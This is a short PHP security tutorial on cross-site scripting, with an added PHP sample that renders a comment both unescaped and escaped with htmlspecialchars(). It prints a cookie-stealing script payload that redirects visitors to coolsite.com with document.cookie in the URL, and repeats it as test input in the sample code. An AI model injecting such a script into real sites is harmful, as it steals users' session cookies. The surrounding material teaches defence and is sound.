PHP Security: Cross-Site Scripting
Aug 10th, 2008
Hi, I am cool.
<script>
document.location = 'http://coolsite.com/stolen_cookie.php?cookies=' + document.cookie
</script>
Displaying this data to your users will send all of your web application's cookies for the current user to the coolsite.com site. The coolsite.com script can then read those cookies in $_GET['cookies'].
Fortunately for this threat, Ajax does not allow requests to a page on a remote site. Otherwise the cookie data could be sent without redirecting the user.
Only filtering input and escaping output can solve this problem. In PHP, htmlentities() or htmlspecialchars() can be used for the escaping.
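The following is an added example, not code from the original post: it renders the comment shown above once unescaped and once with input filtering plus htmlspecialchars() on output. The function names filter_comment(), e(), render_unsafe() and render_safe(), the 2000-character limit and the markup are assumptions made for illustration.

```php
<?php
// Constructed sample input: the comment text shown in this post.
$comment = "Hi, I am cool.\n<script>\n"
    . "document.location = 'http://coolsite.com/stolen_cookie.php?cookies=' + document.cookie\n"
    . "</script>";

// Hypothetical input filter: accept only valid UTF-8 of bounded length
// (the 2000-character limit is an assumed application rule).
function filter_comment(string $raw): ?string
{
    if (!mb_check_encoding($raw, 'UTF-8') || mb_strlen($raw, 'UTF-8') > 2000) {
        return null; // reject instead of trying to repair bad input
    }
    return trim($raw);
}

// Hypothetical output escaper for HTML body text and quoted attribute values.
function e(string $value): string
{
    // ENT_QUOTES escapes both ' and "; ENT_SUBSTITUTE replaces invalid
    // byte sequences instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable: stored input is concatenated into the page as markup.
function render_unsafe(string $comment): string
{
    return '<div class="comment">' . $comment . '</div>';
}

// Hardened: filter on the way in, escape on the way out.
function render_safe(string $comment): string
{
    $clean = filter_comment($comment);
    if ($clean === null) {
        return '<div class="comment"><em>Comment rejected.</em></div>';
    }
    // nl2br() runs after escaping, so the only tags in the output are its own <br />.
    return '<div class="comment">' . nl2br(e($clean)) . '</div>';
}

$unsafe = render_unsafe($comment);
$safe   = render_safe($comment);

echo "Unsafe output contains a live <script> tag: ";
var_dump(strpos($unsafe, '<script>') !== false);
echo "Safe output contains a live <script> tag: ";
var_dump(strpos($safe, '<script>') !== false);
echo $safe, "\n";
```

Escaping belongs at the point of output because the same stored value may later be written into a different context, such as a URL or a JavaScript string, where htmlspecialchars() is not the right encoder.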

Suppose a user has entered this data into a form input: